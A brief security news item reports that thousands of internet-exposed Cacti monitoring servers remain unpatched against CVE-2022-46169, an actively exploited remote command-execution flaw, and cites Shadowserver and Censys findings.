Thousands of internet-exposed Cacti installations are vulnerable to a critical security flaw that is being actively used in attacks, security researchers have warned.
Cacti is an open-source web-based network monitoring and graphing tool designed as a front-end application for the open-source, industry-standard data logging tool RRDtool.
Said vulnerability, tracked as CVE-2022-46169, is an improper authorization issue within the Remote Agent that can be exploited by remote hackers to execute arbitrary OS commands on the server by sending a specially crafted HTTP request to the affected instance. The security issue affects versions 1.2.22 and below.
The vulnerability was patched in early December 2022, and a month later, on January 3, 2023, The Shadowserver Foundation warned that it had detected the first exploitation attempts targeting CVE-2022-46169.
Censy’s researchers said they identified 6,400 internet-accessible Cacti hosts, out of these only 26 were running a patched version of the software.